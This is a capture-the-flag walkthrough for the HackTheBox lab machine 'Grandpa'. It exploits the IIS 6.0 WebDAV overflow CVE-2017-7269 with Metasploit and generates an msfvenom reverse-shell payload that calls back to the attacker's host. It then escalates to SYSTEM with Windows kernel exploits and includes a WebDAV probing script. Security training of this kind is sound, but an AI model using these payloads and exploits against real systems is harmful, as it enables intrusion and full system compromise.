Grandpa HackTheBox WalkThrough

This is the Grandpa HackTheBox machine walkthrough, the 9th machine of our OSCP-like HTB boxes series. In this writeup I have demonstrated step by step how I rooted the Grandpa HTB machine. Before starting, let us know something about this machine. It is a Windows OS box with IP address 10.10.10.14 and difficulty easy, as assigned by its maker. This machine is currently retired, so you will require a VIP subscription at hackthebox.eu to access it. First of all, connect your PC to the HTB VPN and confirm connectivity to the Grandpa machine by pinging 10.10.10.14. If all goes correctly, start hacking. As usual I started by scanning the machine. I used Nmap (a port scanner) for this task, with default scripts (-sC), version detection (-sV) and all 65535 TCP ports (-p-), saving the normal output to a file (-oN). The result is below.
Scanning
$ sudo nmap -sC -sV -p- -oN full_scan.nmap 10.10.10.14

Nmap revealed that only port 80 is open, running the Microsoft IIS web server version 6.0 (the IIS that ships with Windows Server 2003). That is a very outdated version; the current version of IIS is 10.0, so there is a good chance of publicly available exploits. Looking up the version in searchsploit (an exploit-db querying tool) listed a number of potential exploits. Among these, the most reliable one is the WebDAV remote buffer overflow in ScStoragePathFromUrl (CVE-2017-7269), because it gives a remote shell directly, without any credentials.
Searching Available exploit
$searchsploit IIS 6.0

When I searched for this exploit in Metasploit I found it as the module exploit/windows/iis/iis_webdav_scstoragepathfromurl. Using this module I got a user shell very easily, without much effort. For more info about this exploit check this link.
Note: This is a memory-corruption (buffer overflow) exploit against the IIS worker process (w3wp.exe). A failed or repeated attempt can leave that process crashed or in a corrupted state, after which the exploit no longer triggers. So if you lose your session, or another user has already run the exploit against the box, reset the machine before trying again.
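Because the overflow sits in the WebDAV extension and a failed attempt can cost a box reset, it pays to confirm the target is actually IIS 6.0 with WebDAV enabled before firing the module. The following is an added example (not code from the original walkthrough or from Metasploit): it builds a single HTTP OPTIONS request, parses the reply, and reports whether the Server header says Microsoft-IIS/6.0 and whether WebDAV is advertised (a DAV header, or PROPFIND in the Allow/Public method lists). The two sample responses embedded in it are constructed, not captured from the real box; the target IP is taken from the walkthrough and is only used by the live probe() helper.

```python
"""
Pre-exploitation check for the IIS 6.0 WebDAV overflow (CVE-2017-7269).

Added example, not code from the original walkthrough. The ScStoragePathFromUrl
overflow lives in the WebDAV extension, so it only triggers when WebDAV is
enabled, and a failed attempt can crash the worker process and force a box
reset. One OPTIONS request tells us both things in advance:
  1. the Server header reports Microsoft-IIS/6.0
  2. WebDAV is on (DAV header present and/or PROPFIND advertised in Allow/Public)
The target IP below and the two sample responses are assumptions/constructed.
"""
import socket

TARGET = "10.10.10.14"  # Grandpa's IP from the walkthrough; used only by probe()


def build_options_request(host, path="/"):
    """Raw HTTP/1.1 OPTIONS request as bytes (Connection: close so recv() ends)."""
    return (
        "OPTIONS {} HTTP/1.1\r\n"
        "Host: {}\r\n"
        "User-Agent: webdav-check\r\n"
        "Connection: close\r\n\r\n"
    ).format(path, host).encode("ascii")


def parse_http_response(raw):
    """Return (status_code, headers) with header names lower-cased.
    Only the head is parsed; any body is ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def assess_webdav(raw):
    """Decide from an OPTIONS response whether the host looks like IIS 6.0 with
    WebDAV enabled, i.e. a plausible target for iis_webdav_scstoragepathfromurl."""
    status, headers = parse_http_response(raw)
    methods = set()
    for key in ("allow", "public"):  # IIS lists methods in both headers
        if key in headers:
            methods.update(m.strip().upper() for m in headers[key].split(","))
    server = headers.get("server", "")
    iis6 = server.lower().startswith("microsoft-iis/6.")
    webdav = "dav" in headers or "PROPFIND" in methods
    return {
        "status": status,
        "server": server,
        "iis6": iis6,
        "webdav_enabled": webdav,
        "methods": sorted(methods),
        "likely_vulnerable": iis6 and webdav,
    }


def probe(host=TARGET, port=80, timeout=5.0):
    """Live check: send the OPTIONS request over TCP and assess the reply.
    Not exercised offline; needs the HTB VPN up."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_options_request(host))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return assess_webdav(b"".join(chunks))


# Constructed sample responses (not captured from the real box), modelled on
# what IIS 6.0 with WebDAV and a modern IIS without it typically return.
SAMPLE_IIS6_WEBDAV = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"MS-Author-Via: DAV\r\n"
    b"DAV: 1, 2\r\n"
    b"Public: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, "
    b"DELETE, COPY, MOVE, LOCK, UNLOCK, SEARCH\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    b"Content-Length: 0\r\n\r\n"
)
SAMPLE_IIS10_NO_DAV = (
    b"HTTP/1.1 200 OK\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    b"Server: Microsoft-IIS/10.0\r\n"
    b"Public: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    for name, raw in (("iis6+webdav", SAMPLE_IIS6_WEBDAV),
                      ("iis10", SAMPLE_IIS10_NO_DAV)):
        print(name, assess_webdav(raw))
    # probe() against the live box once the VPN is up, e.g. print(probe())
```

Run it as-is to see the two constructed cases; against the live box call probe(). If likely_vulnerable comes back False the module is not worth firing: either WebDAV is off (the overflow is unreachable) or the worker process has already died and the box needs a reset.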
Getting User Shell
msf5 > search ScStoragePathFromUrl
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.10
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
meterpreter > sysinfo

You can see we have easily got a user shell. When I tried to grab the user flag it gave me access denied. The session runs as the IIS worker process account (NT AUTHORITY\NETWORK SERVICE), which has no rights on another user's Desktop, so I moved on to escalating privileges to Administrator.
Privilege Escalation
To escalate privileges to Administrator we first have to find a privilege escalation vector. Since we are inside a meterpreter session I used multi/recon/local_exploit_suggester, a post-exploitation module that runs the check method of Metasploit's local exploit modules (mostly kernel and service exploits) against the session and lists those whose patch appears to be missing on the victim.
Finding PrivEsc Vector
meterpreter > run multi/recon/local_exploit_suggester

Local Exploit Suggester listed 6 exploits that could be used to get an admin shell. I tried each of them one by one and every exploit failed with an access denied error. When I tried to drop into a command prompt using the shell command of meterpreter, the shell died very soon. This is because our session lives inside the exploited w3wp.exe worker process, whose memory was corrupted by the overflow: child processes spawned from it die quickly and the local exploits cannot run properly. To solve this I created a fresh meterpreter session from the existing one, so that the new session runs in a clean process (migrating the session to another process with the migrate command is the usual alternative). With the new session I ran the kernel exploits listed by local_exploit_suggester again, and two of them easily gave me an administrator shell. So our PrivEsc vector is a Kernel Exploit.
To create a new meterpreter shell I did the following:
1. Created an msfvenom payload, shell.exe.
2. Changed directory to C:\Windows\Temp (a world-writable directory) on the Grandpa box.
3. Uploaded shell.exe to the Temp folder using the upload command of meterpreter.
4. Started a listener in msfconsole.
5. Executed the shell.exe payload using the execute meterpreter command.
Upgrading Shell
Creating Payload
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4321 -f exe > shell.exe
Here I used a 32-bit payload (windows/meterpreter/reverse_tcp is the x86 payload) because the Grandpa machine, a 32-bit Windows Server 2003 box, has a 32-bit architecture.
Getting Upgraded User Shell
The handler must be listening before shell.exe is executed, otherwise the callback has nowhere to go. Background the current meterpreter session, start the handler (as a job with -j, or in a second msfconsole), then return to the session for the upload.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LPORT 4321
msf5 exploit(multi/handler) > set LHOST 10.10.14.10
msf5 exploit(multi/handler) > exploit
Uploading & Executing
meterpreter > cd "C:\Windows\Temp"
meterpreter > upload /home/deepak/HTB/Boxes/Grandpa/shell.exe
meterpreter > execute -f shell.exe
When execute returns, the handler reports a new meterpreter session opened; that new session ID is the one to use for privilege escalation.

So we have upgraded our meterpreter session to one running in a clean process. Let us escalate privileges to SYSTEM. exploit/windows/local/ms14_070_tcpip_ioctl (tcpip.sys IOCTL bug, CVE-2014-4076) and exploit/windows/local/ms10_015_kitrap0d (KiTrap0D, CVE-2010-0232) were the two modules that gave me an admin shell; both need a 32-bit session in a stable process, which is exactly what the upgrade provided. Set SESSION to the ID of the new, upgraded session, not the original one.
Getting Root Shell
meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.10
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit
meterpreter > getuid

We are NT AUTHORITY\SYSTEM now, the highest privilege on Windows. Let us capture the user and root flags. Since our cmd shell dies very fast, we can use meterpreter's own search command to locate the flags without leaving meterpreter.
Capture User Flag
meterpreter > search -d C:\\ -f user.txt
meterpreter > cat "c:\Documents and Settings\Harry\Desktop\user.txt"

Capture Root Flag
meterpreter > search -d C:\\ -f root.txt
meterpreter > cat "c:\Documents and Settings\Administrator\Desktop\root.txt"

This was how I rooted the Grandpa HackTheBox machine. I learnt a lot from hunting this box, and I hope you have also learnt something new from it. Thanks for reading this writeup. Write about your experience in the comment section. For any suggestion or query related to the walkthrough, feel free to write to us at [email protected].
The next retired machine walkthrough is Granny.